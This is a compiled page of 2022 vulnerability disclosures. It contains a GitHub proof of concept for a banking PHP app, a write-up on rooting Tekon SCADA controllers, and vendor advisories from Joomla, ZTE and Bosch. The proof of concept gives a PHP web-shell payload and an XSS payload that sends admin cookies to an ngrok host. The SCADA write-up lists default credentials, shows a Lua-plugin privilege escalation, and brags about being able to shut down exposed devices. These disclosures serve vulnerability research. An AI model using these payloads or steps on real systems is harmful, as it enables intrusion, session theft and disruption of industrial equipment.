A remote code execution (RCE) vulnerability in Online Banking System Protect v1.0 allows attackers to execute arbitrary code via a crafted PHP file uploaded through the Upload Image function.

main

Switch branches/tags

CVE/**CVE-2022-26645**/

Go to file

CVE/**CVE-2022-26645**/

**Latest commit**

![@erik-451](https://avatars.githubusercontent.com/u/47476901?s=48&v=4)

erik-451 Create README.md

9b75638

Mar 29, 2022

Create README.md

`9b75638`

**Git stats**

*   **History**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

. .

README.md

Create README.md

Mar 29, 2022

Tittle: Online Banking System RCE Author: (Erik451) Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html Version: OBS 1.0 CVE: CVE-2022-26645 Steps to reproduce:

**README.md**

**Tittle: Online Banking System RCE****Author: (Erik451)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html****Version: OBS 1.0**

*   Description: Potential RCE and XSS via file upload. A user can use the upload functionality to gain access to the server crafting php code.

**Steps to reproduce:**

*   **1- Go to http://web.com/admin/?page=user**
*   **2- Modify your avatar profile and upload your php code.**

Payload used: `<?php echo shell_exec($_GET['shell']);?>`

![phpcode](https://user-images.githubusercontent.com/47476901/160638195-898d61e9-4467-4e32-b95c-362c0aecff97.png)

*   **3- We can see the url of the uploaded file clicking on the image zone.**

![upload](https://user-images.githubusercontent.com/47476901/160638239-48088317-ba7f-497a-bfb4-91eb9570eda7.png)

*   **4- Going to that url we will execute the code.**

http://<ip\_server>/uploads/1648559940\_shell.php?shell=id ![rce](https://user-images.githubusercontent.com/47476901/160638221-ec57e5bf-4793-459e-8763-a913e496825b.png)

CVE-2022-26645: CVE/CVE-2022-26645 at main · erik-451/CVE

Online Banking System Protect v1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via parameters on user profile, system_info and accounts management.

**Tittle: Online Banking System Stored XSS****Author: (Erik451)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html****Version: OBS 1.0**

*   **Description:** A XSS issue in OBS v1.0 allows remote attackers to inject JavaScript in the description parameters. XSS to Privilege Escalation
*   Client can craft a malicious payload, when the administrator goes to "account managment menu" the payload will be executed and the administrator cookies will be sent to the attacker server.

**Steps to reproduce:**

*   1- Go to http://localhost/banking/client/?page=user
*   2- Edite your profile name and paste the payload
*   3- Using a ngrok http server to get the request with the administrator cookie

Payload used to steal the session Cookie:

<script\>var i=new Image;i.src=\`https://2c32-81-9-194-204.ngrok.io/?c=${document.cookie}\`;</script\>

![ngrokclient](https://user-images.githubusercontent.com/47476901/160634443-a0b5afaa-a2f0-404f-9bb2-a3437e534c6d.png)

****Admin Session****

The administrator goes to the manage accounts menu and will execute the payload in background. Now we have the admin cookie on the request

![admincookie](https://user-images.githubusercontent.com/47476901/160656693-e8ce72d9-66f1-4635-85df-f1b8042a8e1f.png)

Edit our cookie with the new admin cookie, reload admin page and now we are administrators.

![loginasadmin](https://user-images.githubusercontent.com/47476901/160634399-08084a58-6c77-47b8-97c7-27c9fb274d8c.png)

**Other XSS**

Payload used: `<img src="x" onerror=prompt(1)>`

**Announcements Tittle**

*   1- Go to http://web.com/admin/?page=announcements/manage\_announcement
*   2- Create or edite an announcement and paste the payload

![XSSannouncement](https://user-images.githubusercontent.com/47476901/160634336-a3d0ff72-878b-4102-9eff-5759581f3695.png)

![XSSannouncement2](https://user-images.githubusercontent.com/47476901/160634352-303bc621-c09d-4993-86e0-316b183809ab.png)

**Accounts Name**

*   1- Go to http://web.com/admin/?page=accounts/manage\_account
*   2- Create or edite an accounts and paste the payload, client account will execute the payload on his session.

**System Info Name**

*   1- Go to http://web.com/admin/?page=system\_info
*   2- Edite the app/system info and paste the payload
*   3- This is the configuration of the app, all clients will see the tittle on the app, the XSS will be executed.

![XSSsysinfo](https://user-images.githubusercontent.com/47476901/160634484-659cfb45-6e0e-446a-be77-76296ee56383.png)

CVE-2022-26644: CVE/CVE-2022-26644 at main · erik-451/CVE

QingScan 1.3.0 is affected by Cross Site Scripting (XSS) vulnerability in all search functions.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-24135: Search function Cross Site Script(XSS) Vulnerability · Issue #17 · 78778443/QingScan

Tekon KIO devices through 2022-03-30 allow an authenticated admin user to escalate privileges to root by uploading a malicious Lua plugin.

Hello World

The following is a writeup about a research i did today at morning march 17 2022 , took me 3 hours and no breakfast, after lunch and succesful pwned i’m writing this.

The affected devices are controllers from a russian brand called tekon.ru

![](https://miro.medium.com/max/1400/1*OdUhjvHMo2bWABwVGB9d6Q.png)

Tekon is responsable to manufacture SCADA devices for russian market specifically, controllers, hubs , modbus devices all focused for building equipment and SCADA enviroments.

I found more than 100+ devices connected to the internet all them located in Russia exclusively , those devices are running with default credentials almost all of them and anyone can connect to them and perform changes and actions as “admin” only .

https://www.shodan.io/search?query=country%3Aru+title%3A%22%D0%BA%D0%BE%D0%BD%D1%82%D1%80%D0%BE%D0%BB%D0%BB%D0%B5%D1%80%22&page=2

![](https://miro.medium.com/max/1400/1*bWQeT7Eo8yqI7qgUfcm_Ug.png)

![](https://miro.medium.com/max/1400/1*PhKxzgsaNx6vDgO7dPHKwg.png)

when you get the default index you will see something like this:

![](https://miro.medium.com/max/1400/1*1RMCCazmJAl6F6-Iaayemg.png)

Everything is in russian but don’t worry gogle translate tab is your friend

![](https://miro.medium.com/max/1400/1*gxa5430A9e81JfxAuGXI2A.png)

After some research i found that tekon.ru did a great job put it in manuals firmwares and software related to easy access for anyone interested to take a look , in our case we need the manuals in order to dig for some default credentials , you know… in our case we need to acces somehow someway ..

![](https://miro.medium.com/max/1400/1*A6v-yhexsShdyJA0T4IKPA.png)

After translation and reading i found the default credentials which are **_admin:secret_** , trying the first result i was completely in, profit for me!!

![](https://miro.medium.com/max/1400/1*WT5eVepSEmBS9GqvxWQwRg.png)

Well now i’m in with defaults what can i do here ? and more importantly what kind of priviledges i have at this moment , you can enable the SSH access from the panel or even change the default password , so the engineers are not going to be able to acces again if you do that …

![](https://miro.medium.com/max/1400/1*2JWBk00QdQLiv1FKO4QBCg.png)

So, with the SSH access my idea was to confirm what type of priviledges the user admin is running right now, for my surprise the admin user is not root, which is boomer at that point of the research .

![](https://miro.medium.com/max/696/1*MzyedwOD2sUFZk8QDIo58A.png)

Well, this means we can not do any interesting action with the admin user like command execution, we need to escalate privilegdes someway somehow .

After reading all manuals and learn about the device features i noticed there are some documented cgi scripts and some of them are not documented

![](https://miro.medium.com/max/1400/1*Q9EngS6PY5nBTuLfzvF3RQ.png)

in the path /srv/www/cgi-bin you can find those scripts , some of them are interesting like the serkill.cgi, you can call it and a process is going to be stoped

![](https://miro.medium.com/max/1348/1*L_TVUDp351d5X5bkDNg2Rg.png)

Well i was thinking….. if i could upload my custom cgi script i could execute bash, but the user admin doesn’t have the permisions, permission is denied.

![](https://miro.medium.com/max/1350/1*4gHJCrRNsxjRTneXH0G2Dw.png)

Mmm.. seriously i need to figure out how to upload my stuff here and execute commands, i knew i was closer.

After reading again the manuls for second time and playing around with the web app i found an interesting module for LUA script plugin upload and execution, just look for the plugin section .

![](https://miro.medium.com/max/1400/1*Llc08ujTYxeOOsqkm8ZKbw.png)

According the manuals you can upload your custom LUA scripts “plugins” and they are going to be executed after you click the save/load button

**_Priviledge Escalation_**

I though the following, LUA plugin should be running as root yes or yes , if i could upload a malicious LUA plugin with custom commands those are going to be executed as root and then i could place a custom cgi in /srv/www/cgi-bin path easily bypassing the admin user priviledges.

Ok here we go, open up your notepad++ and write some LUA code , in order to execute OS commands you just need os.excute

![](https://miro.medium.com/max/1376/1*JkwM2nu-RENH9wbsAKH3Wg.png)

Save the LUA malicious plugin/code and create a .TAR file with 7 zip in windows

Upload the malicios LUA plugin

![](https://miro.medium.com/max/1400/1*gyBdK6myboo8Y90D8WUy1A.png)

Then press save/load

![](https://miro.medium.com/max/1296/1*pW4uMayXxp6Tq1AWljp_WA.png)

At this point you’re blind and you don’t know if your code is being executed, but do you remember the cgi files i show you before ? well there is one for debug purposes and is called **_log.cgi_**

![](https://miro.medium.com/max/472/1*STNIFWGQXL24_20Oot0cIw.png)

invoke log.cgi

After upload the malicious LUA plugin just invoke log.cgi script , go to the bottom and you will see the output for the obscure LUA plugin

BOOM !! WE GOT RCE AND PRIVILEDGE ESCALATION 😎

NOW WE ARE ROOT !!!

![](https://miro.medium.com/max/1400/1*zI7jzmMuSzAfssiADjkfTg.png)

1337

Let’s try with cat /etc/passwd

![](https://miro.medium.com/max/946/1*wu4VI951DWmcljUCeh9FMQ.png)

Yeah !! there you go 😎 gimme the shit

![](https://miro.medium.com/max/1400/1*D1g9qNuW1kh4soNeEbkd4A.png)

cat /etc/passwd

Well i got RCE and privilege escalation from an admin user to root , now we can do whatever, more critically those devices can be shut down at once the 100 creating an impact in russian scada systems , remotely.

From this point now we can create custom cgi files and call them from cgi/bin path and do whatever .

You can follow on twitter for more “on the fly” research and pwn delivery @bertinjoseb

Thanks

CVE-2022-28223: Post auth RCE based in malicious LUA plugin script upload SCADA controllers located in Russia

An issue was discovered in Firmware Analysis and Comparison Tool v3.2. With administrator privileges, the attacker could perform stored XSS attacks by inserting JavaScript and HTML code in user creation functionality.

CVE-2021-44310

An issue was discovered in Joomla! 4.0.0 through 4.1.0. Possible XSS atack vector through SVG embedding in com_media.

**Security Announcements**

**\[20220309\] - Core - XSS attack vector through SVG**

*   **Project:** Joomla!
*   **SubProject:** CMS
*   **Impact:** Moderate
*   **Severity:** Low
*   **Probability:** Low
*   **Versions:** 4.0.0 - 4.1.0
*   **Exploit type:** XSS
*   **Reported Date:** 2021-08-25
*   **Fixed Date:** 2022-03-29
*   **CVE Number:** CVE-2022-23801

**Description**

Possible XSS attack vector through SVG embedding in com\_media.

**Affected Installs**

Joomla! CMS versions 4.0.0 - 4.1.0

**Solution**

Upgrade to version 4.1.1

**Contact**

The JSST at the Joomla! Security Centre.

**Reported By:** Julia Polner, Simon Stockhause

*   
*

CVE-2022-23801: Joomla! Developer Network

An issue was discovered in Joomla! 4.0.0 through 4.1.0. Inadequate content filtering leads to XSS vulnerabilities in various components.

**Security Announcements**

**\[20220308\] - Core - Inadequate content filtering within the filter code**

*   **Project:** Joomla! / Joomla! Framework
*   **SubProject:** CMS / filter
*   **Impact:** Moderate
*   **Severity:** Low
*   **Probability:** Low
*   **Versions:** 4.0.0 - 4.1.0
*   **Exploit type:** XSS
*   **Reported Date:** 2022-01-19
*   **Fixed Date:** 2022-03-29
*   **CVE Number:** CVE-2022-23800

**Description**

Inadequate content filtering leads to XSS vulnerabilities in various components.

**Affected Installs**

Joomla! CMS versions 4.0.0 - 4.1.0

**Solution**

Upgrade to version 4.1.1

**Contact**

The JSST at the Joomla! Security Centre.

**Reported By:** Sebastian Morris, pwnCTRL

*   
*

CVE-2022-23800: Joomla! Developer Network

An issue was discovered in Joomla! 3.7.0 through 3.10.6. Lack of input validation could allow an XSS attack using com_fields.

**Security Announcements**

**\[20220304\] - Core - Missing input validation within com\_fields class inputs**

*   **Project:** Joomla!
*   **SubProject:** CMS
*   **Impact:** Moderate
*   **Severity:** Low
*   **Probability:** Low
*   **Versions:** 3.7.0 - 3.10.6
*   **Exploit type:** XSS
*   **Reported Date:** 2021-05-06
*   **Fixed Date:** 2022-03-29
*   **CVE Number:** CVE-2022-23796

**Description**

Lack of input validation could allow an XSS attack using com\_fields

**Affected Installs**

Joomla! CMS versions 3.7.0 - 3.10.6

**Solution**

Upgrade to version 3.10.7

**Contact**

The JSST at the Joomla! Security Centre.

**Reported By:** Hoàng Nguyễn

*   
*

CVE-2022-23796: Joomla! Developer Network

There is a stored XSS vulnerability in ZTE home gateway product. An attacker could modify the gateway name by inserting special characters and trigger an XSS attack when the user views the current topology of the device through the management page.

**Original release date****:** March 30, 2022

**CVE ID**

CVE-2022-23136

**CVSS 3.****1** **Base Score**

4.3  Medium (AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)

**Description**

There is a stored XSS vulnerability in ZTE home gateway product. An attacker could modify the gateway name by inserting special characters and trigger an XSS attack when the user views the current topology of the device through the management page.

**Affected Products and Fixes**

Product Name

Affected Version

Resolved Version

ZXHN F680

 V6.0.10P3N20

 V6.0.10P1N34

**Source**

The vulnerability was found by ZTE's internal test.

**Update Records**

 March 30, 2022, initial. 

**Version Update Method**

Please contact ZTE Global Customer Support Center to obtain the upgraded version.

**Global Customer Support Center**

http://support.zte.com.cn/support/web/Contact.aspx?\_langType=en

**ZTE PSIRT**

https://www.zte.com.cn/global/cybersecurity/ztepsirt.html

CVE-2022-23136: Security Bulletin Details

A specially crafted TCP/IP packet may cause a camera recovery image telnet interface to crash. It may also cause a buffer overflow which could enable remote code execution. The recovery image can only be booted with administrative rights or with physical access to the camera and allows the upload of a new firmware in case of a damaged firmware.

**Advisory Information**

*   **Advisory ID:** BOSCH-SA-478243-BT
*   **CVE Numbers and CVSS v3.1 Scores:**
    *   CVE-2021-23847
        *   Base Score: 9.8 (Critical)
    *   CVE-2021-23848
        *   Base Score: 8.3 (High)
    *   CVE-2021-23852
        *   Base Score: 4.9 (Medium)
    *   CVE-2021-23853
        *   Base Score: 8.3 (High)
    *   CVE-2021-23854
        *   Base Score: 8.3 (High)
*   **Published:** 09 Jun 2021
*   **Last Updated:** 09 Jun 2021

**Summary**

Multiple vulnerabilities for Bosch IP cameras have been discovered in a Penetration Test from Kaspersky ICS CERT during a certification effort from Bosch.

Bosch rates these vulnerabilities with CVSSv3.1 base scores from 9.8 (Critical) to 4.9 (Medium), where the actual rating depends on the individual vulnerability and the final rating on the customer’s environment.

Customers are strongly advised to upgrade to the fixed versions.

These vulnerabilities were discovered by Alexander Nochvay and Andrey Muravitsky from Kaspersky ICS CERT.

**Affected Products**

*   Bosch CPP Firmware on: CPP4, CPP6, CPP7, CPP7.3, CPP13
    *   CVE-2021-23848
    *   CVE-2021-23852
    *   CVE-2021-23853
*   Bosch CPP Firmware 7.62 on: CPP6, CPP7, CPP7.3
    *   CVE-2021-23854
*   Bosch CPP Firmware 7.70 on: CPP6, CPP7, CPP7.3
    *   CVE-2021-23847
    *   CVE-2021-23854
*   Bosch CPP Firmware 7.72 on: CPP6, CPP7, CPP7.3
    *   CVE-2021-23847
    *   CVE-2021-23854
*   Bosch CPP Firmware 7.75 on: CPP13
    *   CVE-2021-23854
*   Bosch CPP Firmware 7.76 on: CPP13
    *   CVE-2021-23854
*   Bosch CPP Firmware < 7.80 B128 on: CPP6, CPP7, CPP7.3
    *   CVE-2021-23847

**Solution and Mitigations****Software Updates**

The recommended approach is to update the affected Bosch firmware to a fixed version. If an update is not possible in timely manner, users are recommended to follow the mitigations and workarounds described in the following section.

Platform

Affected/revoked firmware

Fixed firmware

CPP4

7.10

7.10.0095

CPP6

7.60, 7.61

7.62.0005

7.70, 7.80

7.80.0129

AVIOTEC

7.61, 7.72

7.72.0013

CPP7

7.60, 7.61

7.62.0005

7.70, 7.72, 7.80

7.80.0129

CPP7.3

7.60, 7.61, 7.62

7.62.0005

7.70, 7.72, 7.73, 7.80

7.80.0129

CPP13

7.75

7.75.0008

**Firewalling**

Disallowing connections from insecure networks to the camera by means of a firewall prevents the attacker from accessing the vulnerable interface.

**IP Filtering**

The camera has the possibility to whitelist networks or IP addresses to only allow access from trusted networks or IPs, preventing an attacker from accessing the camera.

**Using certificate based authentication**

To mitigate the critical vulnerability CVE-2021-23847, certificate based user authentication for the camera can be used as the SSL based authentication happens, before the vulnerable component can be accessed. This prevents an unauthenticated attacker from accessing the interface.

**Secure Configuration Environment**

It is advised to use a Bosch tool like the Configuration Manager to configure the camera, that does not allow for issues like XSS.

When using the web based configuration interface and currently being logged in as administrator, some security precautions can be taken to mitigate XSS vulnerabilities:

*   No other websites or email content should be opened as long as the session to the camera is active
    
*   No links should be clicked from an untrusted external source that link back to the camera.
    
*   Use a different browser than the system default browser to open a session to the camera as there is no XSS between browsers.
    
*   Always log out and/or close the browser (not only the tab) to clear any session data
    

**Vulnerability Details****CVE-2021-23847**

CVE description: A Missing Authentication in Critical Function in Bosch IP cameras allows an unauthenticated remote attacker to extract sensitive information or change settings of the camera by sending crafted requests to the device.

Only devices of the CPP6, CPP7 and CPP7.3 family with firmware 7.70, 7.72, and 7.80 prior to B128 are affected by this vulnerability. Versions 7.62 or lower and INTEOX cameras are not affected.

*   Problem Type:
    *   CWE-287 Improper Authentication
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    *   Base Score: 9.8 (Critical)

**CVE-2021-23848**

CVE description: An error in the URL handler may lead to a reflected cross site scripting (XSS) in the web-based interface. An attacker with knowledge of the camera address can send a crafted link to a user, which will execute javascript code in the context of the user.

*   Problem Type:
    *   CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
*   CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
    *   Base Score: 8.3 (High)

**CVE-2021-23852**

CVE description: An authenticated attacker with administrator rights can call an URL with an invalid parameter that causes the camera to become unresponsive for a few seconds and cause a Denial of Service (DoS).

*   Problem Type:
    *   CWE-400 Uncontrolled Resource Consumption
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H
    *   Base Score: 4.9 (Medium)

**CVE-2021-23853**

CVE description: Improper validation of the HTTP header allows an attacker to inject arbitrary HTTP headers through crafted URLs.

*   Problem Type:
    *   CWE-20 Improper Input Validation
*   CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
    *   Base Score: 8.3 (High)

**CVE-2021-23854**

CVE description: An error in the handling of a page parameter may lead to a reflected cross site scripting (XSS) in the web-based interface.

This issue only affects versions 7.7x and 7.6x. All other versions are not affected.

*   Problem Type:
    *   CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
*   CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
    *   Base Score: 8.3 (High)

**Remark**

Vulnerability classification has been performed using the CVSS v3.1 scoring system . The CVSS environmental score is specific to each customer’s environment and should be defined by the customer to attain a final scoring.

**Additional Resources**

*   \[1\] Firmware Download Area: https://downloadstore.boschsecurity.com/index.php?type=FW

Please contact the Bosch PSIRT if you have feedback, comments, or additional information about this vulnerability at: psirt@bosch.com .

**Revision History**

*   09 Jun 2021: Correction of build version number of fixed firmware
*   09 Jun 2021: Initial Publication

**Appendix****Affected Plattforms and Cameras**

**CPP13**

*   AUTODOME inteox 7000i
    
*   MIC inteox 7100i
    

**CPP7.3**

*   AUTODOME IP 4000i
    
*   AUTODOME IP 5000i
    
*   AUTODOME IP starlight 5000i (IR)
    
*   AUTODOME IP starlight 7000i
    
*   DINION IP 3000i
    
*   DINION IP bullet 4000i
    
*   DINION IP bullet 5000
    
*   DINION IP bullet 5000i
    
*   DINION IP bullet 6000i
    
*   FLEXIDOME IP 3000i
    
*   FLEXIDOME IP 4000i
    
*   FLEXIDOME IP 5000i
    
*   FLEXIDOME IP starlight 5000i (IR)
    
*   FLEXIDOME IP starlight 8000i
    
*   MIC IP starlight 7000i
    
*   MIC IP starlight 7100i
    
*   MIC IP ultra 7100i
    
*   MIC IP fusion 9000i
    

**CPP7**

*   DINION IP starlight 6000
    
*   DINION IP starlight 7000
    
*   DINION IP thermal 8000
    
*   FLEXIDOME IP starlight 6000
    
*   FLEXIDOME IP starlight 7000
    
*   DINION IP thermal 9000 RM
    

**CPP6**

*   DINION IP starlight 8000 12MP
    
*   DINION IP ultra 8000 12MP
    
*   DINION IP ultra 8000 12MP with C/CS mount telephoto lens
    
*   FLEXIDOME IP panoramic 6000 12MP 180
    
*   FLEXIDOME IP panoramic 6000 12MP 360
    
*   FLEXIDOME IP panoramic 6000 12MP 180 IVA
    
*   FLEXIDOME IP panoramic 6000 12MP 360 IVA
    
*   FLEXIDOME IP panoramic 7000 12MP 180
    
*   FLEXIDOME IP panoramic 7000 12MP 360
    
*   FLEXIDOME IP panoramic 7000 12MP 180 IVA
    
*   FLEXIDOME IP panoramic 7000 12MP 360 IVA
    

**CPP4**

*   AUTODOME IP 4000 HD
    
*   AUTODOME IP 5000 HD
    
*   AUTODOME IP 5000 IR
    
*   AUTODOME 7000 series
    
*   DINION HD 1080p
    
*   DINION HD 1080p HDR
    
*   DINION HD 720p
    
*   DINION imager 9000 HD
    
*   DINION IP bullet 4000
    
*   DINION IP bullet 5000
    
*   DINION IP 4000 HD
    
*   DINION IP 5000 HD
    
*   DINION IP 5000 MP
    
*   DINION IP starlight 7000 HD
    
*   FLEXIDOME corner 9000 MP
    
*   FLEXIDOME HD 1080p
    
*   FLEXIDOME HD 1080p HDR
    
*   FLEXIDOME HD 720p
    
*   Vandal-proof FLEXIDOME HD 1080p
    
*   Vandal-proof FLEXIDOME HD 1080p HDR
    
*   Vandal-proof FLEXIDOME HD 720p
    
*   FLEXIDOME IP micro 2000 HD
    
*   FLEXIDOME IP micro 2000 IP
    
*   FLEXIDOME IP indoor 4000 HD
    
*   FLEXIDOME IP indoor 4000 IR
    
*   FLEXIDOME IP outdoor 4000 HD
    
*   FLEXIDOME IP outdoor 4000 IR
    
*   FLEXIDOME IP indoor 5000 HD
    
*   FLEXIDOME IP indoor 5000 MP
    
*   FLEXIDOME IP micro 5000 MP
    
*   FLEXIDOME IP outdoor 5000 HD
    
*   FLEXIDOME IP outdoor 5000 MP
    
*   FLEXIDOME IP panoramic 5000
    
*   IP bullet 4000 HD
    
*   IP bullet 5000 HD
    
*   IP micro 2000
    
*   IP micro 2000 HD
    
*   MIC IP dynamic 7000
    
*   MIC IP starlight 7000
    
*   TINYON IP 2000 family

Tag

#xss